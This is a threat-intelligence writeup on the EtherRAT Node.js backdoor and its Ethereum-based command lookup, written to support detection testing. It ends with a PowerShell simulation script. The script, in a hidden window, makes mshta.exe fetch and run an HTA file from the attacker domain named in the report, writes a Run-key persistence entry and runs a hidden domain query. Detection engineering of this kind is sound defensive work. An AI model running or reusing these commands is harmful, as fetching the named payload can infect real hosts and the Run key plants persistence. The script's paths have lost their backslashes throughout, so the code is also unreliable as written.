EtherRAT & SYS_INFO Module: C2 on Ethereum (EtherHiding), Target Selection, CDN-Like Beacons

Summary

EtherRAT is a Node.js backdoor that resolves its command-and-control endpoints from Ethereum smart contracts using an “EtherHiding” approach. It blends into normal web traffic by shaping beacons to resemble benign CDN requests, while targeting high-value data such as cryptocurrency wallets and cloud credentials. Initial access is commonly driven by ClickFix-style social engineering or fake IT-support lures that trigger malicious HTA execution through pcalua.exe and mshta.exe.

Investigation

The eSentire Threat Response Unit observed a multi-stage loader chain that includes an AES-256-CBC decryption workflow, persistence via an HKCU Run registry value, and a SYS_INFO module responsible for broad host profiling. EtherRAT reaches out to multiple public Ethereum RPC providers to locate the relevant smart contract, then derives CDN-like URLs and polls them for tasking and follow-on commands, reinforcing its “legitimate traffic” disguise.

Mitigation

Use AppLocker or WDAC to block or tightly control pcalua.exe and mshta.exe, and restrict the Windows Run dialog via Group Policy. Where feasible, limit or block access to known public crypto RPC infrastructure and alert on unexpected Ethereum RPC usage from endpoints that do not require it. Deploy endpoint controls that can detect Node.js-based backdoors and monitor for abnormal beaconing patterns that mimic CDN fetch behavior to the identified domains.

Response

If EtherRAT activity is detected, isolate the endpoint, terminate the running process, and remove the HKCU Run persistence entry along with any dropped artifacts. Perform a full forensic sweep to confirm no additional payloads were staged, and rotate exposed credentials—prioritizing cryptocurrency wallet secrets and cloud service keys. Expand hunting across the environment for similar Ethereum-RPC lookups and CDN-like polling behavior to scope potential spread.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

• Attack Narrative & Commands:

  1. Initial Access – ClickFix Dropper: The attacker leverages a malicious ClickFix installer that runs a hidden cmd.exe which calls pcalua.exe.
  2. Indirect Execution: pcalua.exe is instructed to launch mshta.exe against a remote HTA file hosted at https://www‑flow‑submission‑management.shepherdsestates.uk/shep.hta. This HTA script loads the EtherRAT payload.
  3. Persistence Setup: The dropper adds a Run registry value under HKCUSoftwareMicrosoftWindowsCurrentVersionRun pointing to a chained conhost.exe → node.exe execution chain, ensuring the malware starts on user logon.
  4. Domain Reconnaissance: In parallel, a PowerShell one‑liner is executed to read the machine’s domain name, signalling the attacker that the host is domain‑joined.

  All three command lines are executed from a single hidden cmd.exe instance, matching the Sigma rule’s indicator1/indicator2 or indicator3 combination.

• Regression Test Script: The script below reproduces the exact command lines (user‑specific paths are resolved via environment variables).

  # -------------------------------------------------------------
  # EtherRAT Initial Access Simulation – PowerShell wrapper
  # -------------------------------------------------------------
  $username = $env:USERNAME
  $htaUrl = "https://www-flow-submission-management.shepherdsestates.uk/shep.hta"
  $runKeyPath = 'HKCU:SoftwareMicrosoftWindowsCurrentVersionRun'
  $runValueName = '0c939bf7ae8f'
  $conhostPath = "$env:WINDIRSystem32conhost.exe"
  $nodePath = "C:Users$usernameAppDataLocalVZM5DHxgYbxqnode.exe"
  $payloadBin = "C:Users$usernameAppDataLocalVZM5DHTlHAiIlxoF.bin"
  
  # 1. Indicator 1 – pcalua -> mshta
  $cmd1 = "C:Windowssystem32cmd.exe /min /c `"pcalua.exe -a mshta.exe -c $htaUrl`""
  Start-Process -FilePath "C:Windowssystem32cmd.exe" -ArgumentList "/min /c `"pcalua.exe -a mshta.exe -c $htaUrl`"" -WindowStyle Hidden
  
  # 2. Indicator 2 – Registry Run key with conhost chain
  $regCommand = "reg add `"HKCUSoftwareMicrosoftWindowsCurrentVersionRun`" /v `"$runValueName`" /t REG_SZ /d `"$conhostPath --headless `"$nodePath`" `"$payloadBin`"`" /f"
  $cmd2 = "C:Windowssystem32cmd.exe /d /s /c `"$regCommand`""
  Start-Process -FilePath "C:Windowssystem32cmd.exe" -ArgumentList "/d /s /c `"$regCommand`"" -WindowStyle Hidden
  
  # 3. Indicator 3 – PowerShell domain query
  $psCommand = "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command `"(Get-WmiObject Win32_ComputerSystem).Domain`""
  $cmd3 = "C:Windowssystem32cmd.exe /d /s /c `"$psCommand`""
  Start-Process -FilePath "C:Windowssystem32cmd.exe" -ArgumentList "/d /s /c `"$psCommand`"" -WindowStyle Hidden
  
  Write-Host "`n[+] Simulation commands issued. Check SIEM for matching alerts."

• Cleanup Commands: Remove the registry entry and delete any files created by the simulation.

  # -------------------------------------------------------------
  # Cleanup – remove Run key and temporary files
  # -------------------------------------------------------------
  $runKeyPath = 'HKCU:SoftwareMicrosoftWindowsCurrentVersionRun'
  $runValueName = '0c939bf7ae8f'
  
  # Delete the Run key value
  if (Test-Path $runKeyPath) {
      Remove-ItemProperty -Path $runKeyPath -Name $runValueName -ErrorAction SilentlyContinue
      Write-Host "[+] Removed registry Run value $runValueName"
  }
  
  # Remove any residual files (if they were created)
  $paths = @(
      "$env:TEMPbenign.txt"               # from baseline (optional)
  )
  foreach ($p in $paths) {
      if (Test-Path $p) { Remove-Item $p -Force }
  }
  
  Write-Host "[+] Cleanup complete."